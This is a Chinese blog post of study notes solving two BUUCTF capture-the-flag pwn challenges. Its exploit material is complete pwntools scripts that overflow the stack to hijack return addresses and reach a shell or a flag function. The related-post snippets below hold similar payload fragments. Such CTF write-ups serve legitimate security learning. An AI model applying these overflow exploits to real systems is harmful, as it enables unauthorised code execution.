学习笔记:buuctf pwn题

最新推荐文章于 2023-09-18 20:32:33 发布
最新推荐文章于 2023-09-18 20:32:33 发布
阅读量456 收藏 2
点赞数
分类专栏: buuctf 文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RookieMOR/article/details/125344362
版权

1.bjdctf_2020_babystack:

先checksec一下:

64位,打开了NX保护。再用ida打开:

 可以发现read函数,存在栈溢出。

f12,查看字符串:

发现/bin/sh,存在后门函数backdoor:

 

再找到backdoor的地址:

  

然后就是nbytes的大小,因为在read函数里面nbytes会发送强转,所以先输入一个‘-1’,然后nbytes在read函数里面会变为一个很大的数字。再用栈溢出,获得shell。

获得flag:

 

代码:

from pwn import*

io = remote('node4.buuoj.cn',25870)

payload = b"-1"

io.recvuntil(b"[+]Please input the length of your name:")
io.sendline(payload)

payload = b'a'*(0x10+8) + p64(0x4006e6)

io.recvuntil(b"[+]What's u name?")
io.sendline(payload)

io.interactive()

2.get_started_3dsctf_2016:

先checksec一下:

32位,打开NX保护,用ida打开:

 发现gets函数,大概率是溢出。

f12,发现有一个flag.txt,进入函数:

看大佬的wp,知道了一些简单方法。 

 法1:

因为可以直接发现flag的地址:

 可以直接用gets的溢出,绕过第一个if,直接得到flag。但是只能用本地打通。

法2:

可以构造payload = ‘a'*字符数 + ebp + flag开始地址 + flag结束地址 + a1的地址 + a2的地址,

这里flag的结束地址用exit的地址,确保有回显。

代码:

from pwn import*

io = remote('node4.buuoj.cn',29906)

#'a'*offset + 'ebp' + flag_get + fanhuiflag_get + canshu1 + canshu2
payload = b'a'*0x38
payload += p32(0x80489a0) + p32(0x804e6a0)
payload += p32(0x308CD64F) + p32(0x195719D1)

io.sendline(payload)

io.interactive()

wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==

RookieMOR
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2020MRCTF - 部分Pwn
weixin_44864859的博客
04-09 323
easyoverflow 保护全开,但这里只需要栈溢出覆盖数据满足check函数判断就好了。 exp: from pwn import * context.log_level = 'debug' p = remote('38.39.244.2',28082) payload="a"*48 + "n0t_r3@11y_f1@g" p.sendline(payload) p.interacti...
buuctfpwn(2~10)
yw__y的博客
03-30 959
ACTF出(dropper+master_of_dns)
qq_36386435的博客
07-03 2137
ACTF2022出(dropper+master_of_dns)
BUUCTF之路-pwn1_sctf_20161
qq_30528603的博客
05-27 420
从我们的运行结果看,会把用户输入的I换成you。那就是说会自动帮我们把1字节变3字节,我们可以利用填充I来让程序自动填充到返回地址前。s距离ebp是0x3c也就是60个字节,那么我们填充20个I再加4个字节填充接着拼接我们的后门地址。但是新的问产生了,fgets函数较gets函数安全一点,他有长度限制,我们看到s离ebp的距离有0x3c那么远,但是fgets只能输入32个字节,只通过fgets溢出覆盖不到返回地址。看到有个fgets函数,并且限制长度为32。这是一个32位的程序,只开启了NX保护。
持续更新 BUUCTF——PWN(一)
weixin_41748164的博客
08-13 1047
buuctf pwn
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
browser_pwn:浏览器pwn,现在主要工作
03-22
V8_pwn: V8是Google Chrome浏览器内置的JavaScript引擎,负责快速、高效地执行JavaScript代码。V8_pwn专注于寻找和利用V8引擎中的安全漏洞。这些漏洞可能涉及内存管理错误(如堆溢出、栈溢出或类型混淆),或者是...
welpwn::sparkling_heart:CTFpwn框架
02-04
介绍修剪是一门艺术。 welpwn旨在制作艺术品,使您摆脱数十种毫无意义的工作。产品特点自动为您获取那些魔术值。 libc address heap address stack address program address (带有PIE ) canary 支持多glibc调试。...
pwncollege:部署pwn.college
02-24
大学该存储库具有部署pwn.college实例所需的工件。设置docker build -t pwncollege_challenge containers/pwncollege_challengecp -r CTFd-pwn-college-plugin CTFd/CTFd/pluginsdocker-compose up -ddocker run --...
【CTF】bjdctf_2020_babystack 1
凉水的博客
01-21 1277
思路: 1 先反编译: undefined8 main(void) { undefined local_18 [12]; uint local_c; setvbuf(stdout,(char *)0x0,2,0); setvbuf(stdin,(char *)0x0,1,0); local_c = 0; puts("**********************************"); puts("* Welcome to the BJDCTF! *
bjdctf_2020_babystack
zip471642048的博客
06-22 705
checksec 一下 64位程序 没开啥东西 ,ida看一下程序 咋一看read函数读入0个字符串,读了个寂寞,scanf也不能溢出,好像没有问 但是scanf会读入一个用户输入的数赋值给nbytes ,然后read会读取nbytes大小的字符,也就是说我们可以任意溢出长度 运行这个函数直接拿到shell exp ret 是为了平衡栈 其实往backdoor函数后递+1也行...
BUUCTF PWN记录 (未完待续)
qq_41071646的博客
08-01 1982
最近找了一个新的CTF比赛平台 但是不知道为啥pwn的服务器总是连不上, 所以到时候还是直接本地打 默认2.23 so 如果 有高版本的话 我再切换,,, 逆向的话 先等等吧,,,先不刷。。等有空了再刷 第一 连上就有flag的pwn 直接 运行就有权限,。 第二 RIP覆盖一下 这个没有任何保护 直接 覆盖rip就可以了 from pwn import * conte...
PWNctf的pwn题解
Peanuts
11-08 8591
  importantservice 这个目比较简单,保护开的很多多到我怀疑自己是不是把目想的太简单了,结果果然是这么简单的。。 程序功能分析 main函数分析 main函数的功能并不复杂,开头一个dologic函数对v5这个指针进行一个赋值,然后接着让你输入两个数字,是身高和体重,会有一个check乘积不能大(可能怕你太不匀称
[BUUCTF]PWN20——ciscn_2019_n_5
mcmuyanga的博客
09-07 1212
[BUUCTF]PWN20——ciscn_2019_n_5 附件 步骤: 例行检查,64位,没有开启任何保护 试运行一下程序,看看程序的执行情况 64位ida载入,找到main函数, 逻辑很简单,第一次让我们输入名字,限制输入长度为0x64,看一下name参数,发现name在全局变量bss段上 第二次输入利用gets,没有限制长度,可以对v4造成溢出 利用过程 利用第一个输入点,往name参数里写入shellcode context(arch='amd64',os='linux')
BUUCTF目Reverse & Pwn部分wp(持续更新)
苦行僧的妖孽日常
09-18 1157
BUUCTF目Rverse & Pwn部分的writeup(持续更新)
[buuctf]bjdctf_2020_babystack
逆向萌新的博客
06-19 660
[buuctf]bjdctf_2020_babystack
Buuctf pwn1 详细wp
anxiong1803的博客
09-19 2559
目录 程序基本信息 程序溢出点 确定返回地址 编写exp脚本 成功getshell 程序基本信息 我们可以看到这是一个64程序,没有保护开启。 程序溢出点 gets函数可以读取无限字符,存在栈溢出。 接下来我们测测需要多少字符长度可以溢出...
BUUCTF PWN部分目wp
awxnutpgs545144602的博客
08-16 2007
pwn好难啊 PWN 1,连上就有flag的pwnnc buuoj.cn 6000得到flag 2,RIP覆盖一下用ida分析一下,发现已有了system,只需覆盖RIP为fun()的地址,用peda计算偏移为23,写脚本 from pwn import* sh=remote('f.b...
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值